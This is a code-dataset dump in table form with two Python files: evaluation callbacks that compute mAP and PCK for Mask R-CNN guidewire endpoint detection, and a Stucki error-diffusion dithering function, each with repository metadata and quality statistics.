hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
91241904e244238fe54d661ecdc0d33ab3a1e23c
| 28,064
|
py
|
Python
|
samples/guidewire/compute_ap.py
|
liruiqi0515/mask-rcnn-point
|
8a4da7067b7eb0c638199a7af988a7573a9fffbc
|
[
"MIT"
] | null | null | null |
samples/guidewire/compute_ap.py
|
liruiqi0515/mask-rcnn-point
|
8a4da7067b7eb0c638199a7af988a7573a9fffbc
|
[
"MIT"
] | null | null | null |
samples/guidewire/compute_ap.py
|
liruiqi0515/mask-rcnn-point
|
8a4da7067b7eb0c638199a7af988a7573a9fffbc
|
[
"MIT"
] | null | null | null |
import keras.backend as K
import cv2, time, os
import numpy as np
import model as modellib
from skimage import morphology
class MAPCallback:
def __init__(self,
model,
val_dataset,
class_names,
threshold=5,
inference_num=50,
batch_size=1,
old_version=False):
super(MAPCallback, self).__init__()
self.model = model
self.inference_num = inference_num
self.class_names = class_names
self.num_classes = len(class_names)
self.val_dataset = val_dataset
self.threshold = threshold
self.batch_size = batch_size
self.old_version = old_version
def _voc_ap(self, rec, prec):
# correct AP calculation
# first append sentinel values at the end
mrec = np.concatenate(([0.], rec, [1.]))
mpre = np.concatenate(([0.], prec, [0.]))
# compute the precision envelope
for i in range(mpre.size - 1, 0, -1):
mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
return ap
def calculate_result(self):
true_res = {}
pred_res = []
inference_time = 0
for i in range(self.inference_num):
image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
start = time.time()
results = self.model.detect([image])[0]
end = time.time()
inference_time = inference_time + (end - start)
out_boxes = results['rois']
out_scores = results['scores']
out_masks = results['masks']
pred_res_0 = []
pred_res_1 = []
if len(out_boxes) > 0:
for out_box, out_score, out_mask in zip(
out_boxes, out_scores, out_masks):
det_point = np.unravel_index(out_mask[:, :, 0].argmax(), out_mask[:, :, 0].shape)
if self.old_version:
pred_res_0.append([i, 0, out_score, det_point[1] + 1, det_point[0] + 1])
else:
pred_res_0.append([i, 0, out_score * out_mask[:, :, 0].max(), det_point[1] + 1, det_point[0] + 1])
# print([i, 0, out_mask[:, :, 0].max(), det_point[1] + 1, det_point[0] + 1])
det_point = np.unravel_index(out_mask[:, :, 1].argmax(), out_mask[:, :, 1].shape)
if self.old_version:
pred_res_1.append([i, 1, out_score, det_point[1] + 1, det_point[0] + 1])
else:
pred_res_1.append([i, 1, out_score * out_mask[:, :, 1].max(), det_point[1] + 1, det_point[0] + 1])
# print([i, 1, out_score * out_mask[:, :, 1].max(), det_point[1] + 1, det_point[0] + 1])
pred_res_0 = nms_point(pred_res_0, 10)
pred_res_1 = nms_point(pred_res_1, 10)
pred_res.extend(pred_res_0)
pred_res.extend(pred_res_1)
true_res[i] = point # [num_guidewire, num_point, 2]
# print(point)
print('avg_infer_time:' + str(inference_time / self.inference_num))
return true_res, pred_res
def compute_aps(self, true_res, pred_res, threshold):
APs = {}
for cls in range(self.num_classes):
pred_res_cls = [x for x in pred_res if x[1] == cls]
if len(pred_res_cls) == 0:
APs[cls] = 0
continue
true_res_cls = {}
npos = 0
for index in true_res: # index is the image_id
guidewires = true_res[index] # [num_guidewire, num_point, 2]
npos += len(guidewires) # compute recall
point_pos = np.array([x[cls] for x in guidewires]) # [num_guidewire, 2]
true_res_cls[index] = {
'point_pos': point_pos,
}
ids = [x[0] for x in pred_res_cls]
scores = np.array([x[2] for x in pred_res_cls])
points = np.array([x[3:] for x in pred_res_cls])
sorted_ind = np.argsort(-scores)
points = points[sorted_ind, :] # sorted
ids = [ids[x] for x in sorted_ind] # sorted
nd = len(ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
for j in range(nd):
ture_point = true_res_cls[ids[j]]
point1 = points[j, :] # [2]
dis_min = np.inf
PGT = ture_point['point_pos'] # [num_guidewire, 2]
if len(PGT) > 0:
dis_square = np.square(PGT[:, 0] - point1[0]) + np.square(PGT[:, 1] - point1[1])
dis_min = np.min(dis_square)
if dis_min < threshold * threshold:
tp[j] = 1.
else:
fp[j] = 1.
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / np.maximum(float(npos), np.finfo(np.float64).eps)
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
ap = self._voc_ap(rec, prec)
APs[cls] = ap
return APs
def on_epoch_end(self, logs=None):
logs = logs or {}
K.set_learning_phase(0)
true_res, pred_res = self.calculate_result()
for th in [3, 5, 7, 9]:
APs = self.compute_aps(true_res, pred_res, th)
for cls in range(self.num_classes):
if cls in APs:
print(self.class_names[cls] + ' ap: ', APs[cls])
mAP = np.mean([APs[cls] for cls in APs])
print('mAP: ', mAP)
logs['mAP'] = mAP
def nms_point(point_list, thresh):
'''point_list: [i, point_id, score, x, y]'''
keep = []
while point_list:
keep.append(point_list[0])
now = point_list[0]
del point_list[0]
del_inds = []
for i in range(len(point_list)):
dis_square = np.square(point_list[i][3] - now[3]) + np.square(point_list[i][4] - now[4])
if dis_square < thresh * thresh:
del_inds.append(i)
if del_inds:
del_inds.reverse()
for i in del_inds:
del point_list[i]
return keep
class MAPCallbackSame(MAPCallback):
def __init__(self,
model,
val_dataset,
class_names,
threshold=5,
inference_num=50,
batch_size=1):
super(MAPCallbackSame, self).__init__()
self.model = model
self.inference_num = inference_num
self.class_names = class_names
self.num_classes = len(class_names)
self.val_dataset = val_dataset
self.threshold = threshold
self.batch_size = batch_size
def compute_point(self, pred, thresh, sigma):
point = -1 * np.ones((2, 2), np.int32)
idx = np.unravel_index(pred.argmax(), pred.shape)
# print(pred.shape)
if pred[idx[0], idx[1]] > thresh:
point[0] = [idx[0], idx[1]]
minus = makeGaussian(pred.shape[0], pred.shape[1], sigma, (idx[1], idx[0])) * pred[idx[0], idx[1]]
pred = pred - minus
idx_1 = np.unravel_index(pred.argmax(), pred.shape)
if pred[idx_1[0], idx_1[1]] > thresh:
point[1] = [idx_1[0], idx_1[1]]
return point
def calculate_result(self):
true_res = {}
pred_res = []
inference_time = 0
for i in range(self.inference_num):
image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
start = time.time()
results = self.model.detect([image])[0]
end = time.time()
inference_time = inference_time + (end - start)
out_boxes = results['rois']
out_scores = results['scores']
out_masks = results['masks']
if len(out_boxes) > 0:
for out_box, out_score, out_mask in zip(
out_boxes, out_scores, out_masks):
det_point = self.compute_point(out_mask[:, :, 0], 0.1, 6)
pred_res.append([i, 0, out_score, det_point[0][1] + 1, det_point[0][0] + 1])
pred_res.append([i, 0, out_score, det_point[1][1] + 1, det_point[1][0] + 1])
# print([i, 0, out_score, det_point[0][1], det_point[0][0]])
# print([i, 0, out_score, det_point[1][1], det_point[1][0]])
true_res[i] = point # [num_guidewire, num_point, 2]
print('avg_infer_time:' + str(inference_time / self.inference_num))
return true_res, pred_res
def compute_aps(self, true_res, pred_res, threshold):
APs = {}
for cls in range(self.num_classes):
pred_res_cls = [x for x in pred_res if x[1] == cls]
if len(pred_res_cls) == 0:
APs[cls] = 0
continue
true_res_cls = {}
npos = 0
for index in true_res: # index is the image_id
guidewires = true_res[index] # [num_guidewire, num_point, 2]
guidewires = np.reshape(guidewires, [guidewires.shape[0] * guidewires.shape[1], 1, 2])
npos += len(guidewires) # compute recall
point_pos = np.array([x[cls] for x in guidewires]) # [num_guidewire, 2]
true_res_cls[index] = {
'point_pos': point_pos,
}
ids = [x[0] for x in pred_res_cls]
scores = np.array([x[2] for x in pred_res_cls])
points = np.array([x[3:] for x in pred_res_cls])
sorted_ind = np.argsort(-scores)
points = points[sorted_ind, :] # sorted
ids = [ids[x] for x in sorted_ind] # sorted
nd = len(ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
for j in range(nd):
ture_point = true_res_cls[ids[j]]
point1 = points[j, :] # [2]
dis_min = np.inf
PGT = ture_point['point_pos'] # [num_guidewire, 2]
if len(PGT) > 0:
dis_square = np.square(PGT[:, 0] - point1[0]) + np.square(PGT[:, 1] - point1[1])
dis_min = np.min(dis_square)
if dis_min < threshold * threshold:
tp[j] = 1.
else:
fp[j] = 1.
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / np.maximum(float(npos), np.finfo(np.float64).eps)
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
ap = self._voc_ap(rec, prec)
APs[cls] = ap
return APs
def makeGaussian(height, width, sigma=3, center=None):
""" make一个高斯核,是生成heatmap的一个部分
"""
x = np.arange(0, width, 1, float)
y = np.arange(0, height, 1, float)[:, np.newaxis]
if center is None:
x0 = width // 2
y0 = height // 2
else:
x0 = center[0]
y0 = center[1]
return np.exp(-4 * np.log(2) * ((x - x0) ** 2 + (y - y0) ** 2) / (sigma ** 2))
class MAPCallbackMask(MAPCallbackSame):
def __init__(self,
model,
val_dataset,
class_names,
threshold=0.1,
inference_num=50,
batch_size=1):
# super(MAPCallbackMask, self).__init__()
self.model = model
self.inference_num = inference_num
self.class_names = class_names
self.num_classes = len(class_names)
self.val_dataset = val_dataset
self.threshold = threshold
self.batch_size = batch_size
def compute_point_from_mask(self, pred, thresh):
pred = (pred > thresh).astype('uint8')
skeleton = morphology.skeletonize(pred)
fil = np.array([[1, 1, 1], [1, 8, 1], [1, 1, 1]])
conv = cv2.filter2D(np.float32(skeleton), -1, fil)
result = conv == 9
x, y = np.where(result == True)
endpoint = []
num_point = min(len(x), 2)
for i in range(num_point):
endpoint.append(np.array([x[i], y[i]]))
return endpoint
def calculate_result(self):
true_res = {}
pred_res = []
inference_time = 0
for i in range(self.inference_num):
image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
start = time.time()
results = self.model.detect([image])[0]
end = time.time()
inference_time = inference_time + (end - start)
out_boxes = results['rois']
out_scores = results['scores']
out_masks = results['masks']
if len(out_boxes) > 0:
for out_box, out_score, out_mask in zip(
out_boxes, out_scores, out_masks):
det_point = self.compute_point_from_mask(out_mask[:, :, 0], self.threshold)
for det_point_i in det_point:
pred_res.append([i, 0, out_score, det_point_i[1] + 1, det_point_i[0] + 1])
# print([i, 0, out_score, det_point[0][1], det_point[0][0]])
# print([i, 0, out_score, det_point[1][1], det_point[1][0]])
true_res[i] = point # [num_guidewire, num_point, 2]
# print(point)
print('avg_infer_time:' + str(inference_time / self.inference_num))
return true_res, pred_res
def compute_aps(self, true_res, pred_res, threshold):
APs = {}
for cls in range(self.num_classes):
pred_res_cls = [x for x in pred_res if x[1] == cls]
if len(pred_res_cls) == 0:
APs[cls] = 0
continue
true_res_cls = {}
npos = 0
for index in true_res: # index is the image_id
guidewires = true_res[index] # [num_guidewire, num_point, 2]
guidewires = np.reshape(guidewires, [guidewires.shape[0] * guidewires.shape[1], 1, 2])
npos += len(guidewires) # compute recall
point_pos = np.array([x[cls] for x in guidewires]) # [num_guidewire, 2]
true_res_cls[index] = {
'point_pos': point_pos,
}
ids = [x[0] for x in pred_res_cls]
scores = np.array([x[2] for x in pred_res_cls])
points = np.array([x[3:] for x in pred_res_cls])
sorted_ind = np.argsort(-scores)
points = points[sorted_ind, :] # sorted
ids = [ids[x] for x in sorted_ind] # sorted
nd = len(ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
for j in range(nd):
ture_point = true_res_cls[ids[j]]
point1 = points[j, :] # [2]
dis_min = np.inf
PGT = ture_point['point_pos'] # [num_guidewire, 2]
if len(PGT) > 0:
dis_square = np.square(PGT[:, 0] - point1[0]) + np.square(PGT[:, 1] - point1[1])
dis_min = np.min(dis_square)
if dis_min < threshold * threshold:
tp[j] = 1.
else:
fp[j] = 1.
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / np.maximum(float(npos), np.finfo(np.float64).eps)
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
ap = self._voc_ap(rec, prec)
APs[cls] = ap
return APs
def makeGaussian(height, width, sigma=3, center=None):
""" make一个高斯核,是生成heatmap的一个部分
"""
x = np.arange(0, width, 1, float)
y = np.arange(0, height, 1, float)[:, np.newaxis]
if center is None:
x0 = width // 2
y0 = height // 2
else:
x0 = center[0]
y0 = center[1]
return np.exp(-4 * np.log(2) * ((x - x0) ** 2 + (y - y0) ** 2) / (sigma ** 2))
class MAPCallbackBox:
def __init__(self,
model,
val_dataset,
class_names,
inference_num=50,
batch_size=1):
super(MAPCallbackBox, self).__init__()
self.model = model
self.inference_num = inference_num
self.class_names = class_names
self.num_classes = len(class_names)
self.val_dataset = val_dataset
self.batch_size = batch_size
def _voc_ap(self, rec, prec):
# correct AP calculation
# first append sentinel values at the end
mrec = np.concatenate(([0.], rec, [1.]))
mpre = np.concatenate(([0.], prec, [0.]))
# compute the precision envelope
for i in range(mpre.size - 1, 0, -1):
mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
return ap
def calculate_result(self):
true_res = {}
pred_res = []
inference_time = 0
for i in range(self.inference_num):
image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
start = time.time()
results = self.model.detect([image])[0]
end = time.time()
inference_time = inference_time + (end - start)
out_boxes = results['rois']
out_scores = results['scores']
if len(out_boxes) > 0:
for out_box, out_score in zip(
out_boxes, out_scores):
pred_res.append([i, 0, out_score, out_box])
# print([i, 0, out_score, out_box])
true_res[i] = bbox # [num_guidewire, 4]
# print(bbox)
print('avg_infer_time:' + str(inference_time / self.inference_num))
return true_res, pred_res
def compute_iou(self, box, boxes, box_area, boxes_area):
# Calculate intersection areas
y1 = np.maximum(box[0], boxes[:, 0])
y2 = np.minimum(box[2], boxes[:, 2])
x1 = np.maximum(box[1], boxes[:, 1])
x2 = np.minimum(box[3], boxes[:, 3])
intersection = np.maximum(x2 - x1, 0) * np.maximum(y2 - y1, 0)
union = box_area + boxes_area[:] - intersection[:]
iou = intersection / union
return iou
def compute_aps(self, true_res, pred_res):
APs = {}
for cls in range(self.num_classes):
pred_res_cls = [x for x in pred_res if x[1] == cls]
if len(pred_res_cls) == 0:
APs[cls] = 0
continue
true_res_cls = {}
npos = 0
for index in true_res: # index is the image_id
guidewires = true_res[index] # [num_guidewire, 4]
npos += len(guidewires) # compute recall
point_pos = np.array([x for x in guidewires]) # [num_guidewire, 4]
true_res_cls[index] = {
'point_pos': point_pos,
}
ids = [x[0] for x in pred_res_cls]
scores = np.array([x[2] for x in pred_res_cls])
points = np.array([x[3] for x in pred_res_cls])
sorted_ind = np.argsort(-scores)
points = points[sorted_ind, :] # sorted
ids = [ids[x] for x in sorted_ind] # sorted
nd = len(ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
for j in range(nd):
ture_point = true_res_cls[ids[j]]
box = points[j, :] # [4]
PGT = ture_point['point_pos'] # [num_guidewire, 4]
box_area = (box[2] - box[0]) * (box[3] - box[1])
boxes_area = (PGT[:, 2] - PGT[:, 0]) * (PGT[:, 3] - PGT[:, 1])
if len(PGT) > 0:
IOU = self.compute_iou(box, PGT, box_area, boxes_area)
iou_max = np.max(IOU)
if iou_max > 0.5:
tp[j] = 1.
else:
fp[j] = 1.
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / np.maximum(float(npos), np.finfo(np.float64).eps)
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
ap = self._voc_ap(rec, prec)
APs[cls] = ap
return APs
def on_epoch_end(self, logs=None):
logs = logs or {}
K.set_learning_phase(0) # For BN
true_res, pred_res = self.calculate_result()
APs = self.compute_aps(true_res, pred_res)
for cls in range(self.num_classes):
if cls in APs:
print(self.class_names[cls] + ' ap: ', APs[cls])
mAP = np.mean([APs[cls] for cls in APs])
print('mAP: ', mAP)
logs['mAP'] = mAP
class MAPCallbackPCK:
def __init__(self,
model,
val_dataset,
class_names,
inference_num=50,
batch_size=1):
super(MAPCallbackPCK, self).__init__()
self.model = model
self.inference_num = inference_num
self.class_names = class_names
self.num_classes = len(class_names)
self.val_dataset = val_dataset
self.batch_size = batch_size
def _voc_ap(self, rec, prec):
# correct AP calculation
# first append sentinel values at the end
mrec = np.concatenate(([0.], rec, [1.]))
mpre = np.concatenate(([0.], prec, [0.]))
# compute the precision envelope
for i in range(mpre.size - 1, 0, -1):
mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
return ap
def check_dt(self, box, gtbox):
box_area = (box[2] - box[0]) * (box[3] - box[1])
boxes_area = (gtbox[:, 2] - gtbox[:, 0]) * (gtbox[:, 3] - gtbox[:, 1])
IOU = self.compute_iou(box, gtbox, box_area, boxes_area)
iou_max = np.max(IOU)
if iou_max > 0.5:
return True
else:
return False
def calculate_result(self):
true_res = {}
pred_res = []
inference_time = 0
for i in range(self.inference_num):
image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
start = time.time()
out_masks = self.model.localization([image], [bbox])[0]
# print(out_masks.shape)
end = time.time()
inference_time = inference_time + (end - start)
for out_mask in out_masks:
det_point = np.unravel_index(out_mask[:, :, 0].argmax(), out_mask[:, :, 0].shape)
pred_res.append([i, 0, det_point[1] + 1, det_point[0] + 1])
# print([i, 0, det_point[1] + 1, det_point[0] + 1])
det_point = np.unravel_index(out_mask[:, :, 1].argmax(), out_mask[:, :, 1].shape)
pred_res.append([i, 1, det_point[1] + 1, det_point[0] + 1])
# print([i, 1, det_point[1] + 1, det_point[0] + 1])
true_res[i] = point # [num_guidewire, num_point, 2]
print('avg_infer_time:' + str(inference_time / self.inference_num))
return true_res, pred_res
def compute_iou(self, box, boxes, box_area, boxes_area):
# Calculate intersection areas
y1 = np.maximum(box[0], boxes[:, 0])
y2 = np.minimum(box[2], boxes[:, 2])
x1 = np.maximum(box[1], boxes[:, 1])
x2 = np.minimum(box[3], boxes[:, 3])
intersection = np.maximum(x2 - x1, 0) * np.maximum(y2 - y1, 0)
union = box_area + boxes_area[:] - intersection[:]
iou = intersection / union
return iou
def compute_pck(self, true_res, pred_res, threshold):
APs = {}
for cls in range(self.num_classes):
true_num = 0
pred_res_cls = [x for x in pred_res if x[1] == cls]
num_all = len(pred_res_cls)
if num_all == 0:
APs[cls] = 0
continue
true_res_cls = {}
for index in true_res: # index is the image_id
guidewires = true_res[index] # [num_guidewire, num_point, 2]
point_pos = np.array([x[cls] for x in guidewires]) # [num_guidewire, 2]
true_res_cls[index] = {
'point_pos': point_pos,
}
for j in pred_res_cls:
ture_point = true_res_cls[j[0]]
point1 = j[2:] # [2]
PGT = ture_point['point_pos'] # [num_guidewire, 2]
if len(PGT) > 0:
dis_square = np.square(PGT[:, 0] - point1[0]) + np.square(PGT[:, 1] - point1[1])
dis_min = np.min(dis_square)
if dis_min < threshold * threshold:
true_num += 1
print(true_num, num_all)
APs[cls] = true_num / num_all
return APs
def on_epoch_end(self, logs=None):
logs = logs or {}
K.set_learning_phase(0) # For BN
true_res, pred_res = self.calculate_result()
for th in [3, 5, 7, 9]:
APs = self.compute_pck(true_res, pred_res, th)
for cls in range(self.num_classes):
if cls in APs:
print(self.class_names[cls] + ' ap: ', APs[cls])
mAP = np.mean([APs[cls] for cls in APs])
print('mAP: ', mAP)
logs['mAP'] = mAP
def read_point(txt_path):
with open(txt_path, 'r')as f:
string = f.readlines()
num_guidewire = len(string)
point = np.zeros([num_guidewire, 2, 2], dtype=np.int32)
bbox = np.zeros([num_guidewire, 4], dtype=np.int32)
for index, s in enumerate(string):
item = [int(i) for i in s[:-1].split(' ')]
bbox[index] = np.array([item[2], item[0], item[3], item[1]])
point[index, 0] = np.array([item[4], item[5]], dtype=np.int32)
point[index, 1] = np.array([item[6], item[7]], dtype=np.int32)
return bbox, point
def make_output(filename, model, output_dir):
if not os.path.exists(output_dir):
os.makedirs(output_dir)
image_list = os.listdir(filename)
for pic_name in image_list:
image_path = os.path.join(filename, pic_name)
image = cv2.imread(image_path)
results = model.detect([image])[0]
out_boxes = results['rois']
out_scores = results['scores']
out_masks = results['masks']
if len(out_boxes) > 0:
for out_box, out_score, out_mask in zip(
out_boxes, out_scores, out_masks):
image = cv2.rectangle(image, (out_box[1], out_box[0]), (out_box[3], out_box[2]), (255, 0, 0), 2)
det_point = np.unravel_index(out_mask[:, :, 0].argmax(), out_mask[:, :, 0].shape)
image = cv2.circle(image, (det_point[1] + 1, det_point[0] + 1), 8, (0, 255, 0), 4)
# pred_res.append([i, 0, det_point[1] + 1, det_point[0] + 1])
det_point = np.unravel_index(out_mask[:, :, 1].argmax(), out_mask[:, :, 1].shape)
image = cv2.circle(image, (det_point[1] + 1, det_point[0] + 1), 8, (0, 0, 255), 4)
# pred_res.append([i, 1, det_point[1] + 1, det_point[0] + 1])
out_path = os.path.join(output_dir, pic_name[:-4]+'.png')
cv2.imwrite(out_path, image)
| 40.790698
| 122
| 0.514645
| 3,727
| 28,064
| 3.676684
| 0.068151
| 0.036269
| 0.017733
| 0.021455
| 0.848427
| 0.833102
| 0.825659
| 0.812012
| 0.802452
| 0.788513
| 0
| 0.030936
| 0.35729
| 28,064
| 687
| 123
| 40.850073
| 0.72878
| 0.082775
| 0
| 0.768439
| 0
| 0
| 0.011115
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053173
| false
| 0
| 0.008576
| 0
| 0.109777
| 0.020583
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91489778266b1738c7040cd08cd5ffc369a0e47a
| 1,192
|
py
|
Python
|
half_tones/half_tones/stucki.py
|
giovaninppc/MC920
|
7d46238f4079dabc4769c72cbed44d024fcf5c97
|
[
"MIT"
] | 1
|
2019-08-23T19:23:18.000Z
|
2019-08-23T19:23:18.000Z
|
half_tones/half_tones/stucki.py
|
giovaninppc/MC920
|
7d46238f4079dabc4769c72cbed44d024fcf5c97
|
[
"MIT"
] | null | null | null |
half_tones/half_tones/stucki.py
|
giovaninppc/MC920
|
7d46238f4079dabc4769c72cbed44d024fcf5c97
|
[
"MIT"
] | 1
|
2020-11-05T23:56:49.000Z
|
2020-11-05T23:56:49.000Z
|
from half_tones.check_range import *
def Stucki(img, error: int, x, y, z):
if checkRange(x+1, y, img):
img[x+1][y][z] = img[x+1][y][z] + (8/42) * error
if checkRange(x+2, y, img):
img[x+2][y][z] = img[x+2][y][z] + (4/42) * error
if checkRange(x-2, y+1, img):
img[x-2][y+1][z] = img[x-2][y+1][z] + (2/42) * error
if checkRange(x-1, y+1, img):
img[x-1][y+1][z] = img[x-1][y+1][z] + (4/42) * error
if checkRange(x, y+1, img):
img[x][y+1][z] = img[x][y+1][z] + (8/42) * error
if checkRange(x+1, y+1, img):
img[x+1][y+1][z] = img[x+1][y+1][z] + (4/42) * error
if checkRange(x+2, y+1, img):
img[x+2][y+1][z] = img[x+2][y+1][z] + (2/42) * error
if checkRange(x-2, y+2, img):
img[x-2][y+2][z] = img[x-2][y+2][z] + (1/42) * error
if checkRange(x-1, y+2, img):
img[x-1][y+2][z] = img[x-1][y+2][z] + (2/42) * error
if checkRange(x, y+2, img):
img[x][y+2][z] = img[x][y+2][z] + (4/42) * error
if checkRange(x+1, y+2, img):
img[x+1][y+2][z] = img[x+1][y+2][z] + (2/42) * error
if checkRange(x+2, y+2, img):
img[x+2][y+2][z] = img[x+2][y+2][z] + (1/42) * error
| 42.571429
| 60
| 0.468121
| 266
| 1,192
| 2.090226
| 0.078947
| 0.172662
| 0.080935
| 0.375899
| 0.906475
| 0.760791
| 0.757194
| 0.706835
| 0.706835
| 0.706835
| 0
| 0.106195
| 0.241611
| 1,192
| 27
| 61
| 44.148148
| 0.50885
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.038462
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
